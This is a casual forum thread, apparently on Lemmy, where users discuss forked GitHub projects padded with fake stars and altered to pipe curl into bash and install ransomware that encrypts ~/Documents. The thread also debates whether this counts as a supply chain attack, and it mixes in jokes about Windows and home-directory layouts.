Apparently there’s a bunch of projects getting hit with this, fairly obscure ones though. Project gets forked, suddenly get a pile of stars more than the original, and then there’s a curl-bash pipe inserted into it that runs some ransomeware that encrypts ~/Documents.
About a dozen other projects linked in here from another developer (excuse the Reddit link): https://old.reddit.com/r/golang/comments/1jbzuot/someone_copied_our_github_project_made_it_look/
use windows iif ytu dodn watn virus
You can’t get a virus if your computer’s already dependent on one!
Tru. With Windows defender 💪 i can downloat evry .exe from ze internetz. I currently installing Gta 6 early 😎
I tried that, I ended up with this weird “Windows 11” adware installed and couldn’t get rid of it. There was also a problem with odd programs and advertising showing up in my Start Menu, even after I removed them. Also, my settings would occasionally just change, without my knowledge or permission.
This isn’t really a supply chain attack. It’s more social engineering: fake users, forks, and non-verified code. They’re taking advantage of the fact that most people don’t use verified releases or packages code from open source projects.
GitHub is not compromised, nor sending unintended payloads.
Many of the projects are backend dev tools, like the Atlas provider linked in the thread.
But that’s not a supply chain attack. If projects or platforms are compromised and THEN their code is used by normal means of ingestion of said project, that would be a supply chain attack.
These are unofficial channels created as forks of existing projects in an attempt to fool users into using these instead.
OK, fair enough, I changed the title.
Jokes on them, I don’t keep shit in ~/Documents, all my goodies are on a network share mounted at ~/Netstore
Hahaha. Was about to comment nearly the same thing. My NFS share has a different mount.
~/Documentsis an empty directory
Finally, Linux is popular enough to get targeted by malware!
Another reason that star count is a terrible metric for quality / authenticity. Fake stars are a huge problem that not a lot of people take seriously.
lol, just checked. ~/Documents doesn’t even exist on my machine.
Average arch user
oh oh, I’m a below average arch user. I suspect i copied most of my hoome from debian or something.
I’ll rename it to Dickuments as a security feature.
…the fuck is that title? I got a headache trying to make sense of it.
Yah, I read it afterwards and realized I’d verbed a noun. I’m not proud of it.
Here in Lemmy you can edit titles
I keep saying this curl bash pipe shit needs to stop.
It’s an interesting thing to think about, wouldn’t widespread desktop Linux malware be quite bad because of the lack of any AV/Malware detection typically used?
Uhhhhh, there’s plenty of that being used. From the ground up. Security scanning out the wazzzz. Those are pattern-based scanners though, and this probably wouldn’t be detected because it’s a blob of binary junk with a script inside. GitHub should honestly put something on their storage backends to warn users, but that’s a whole ball of wax people probably don’t want to get into.
Yay, finally Linux is being attacked!
And as expected it takes whole lot more than clicking on an email attachment
Always check before you curl download something!
good time to not have a ~/Documents and keep backups encrypted off site
That simply wouldn’t work in non-english machines lmao
Why the Documents folder tho? Who expects important stuff to be there?
Now all my Linux ISOs are gone, smh
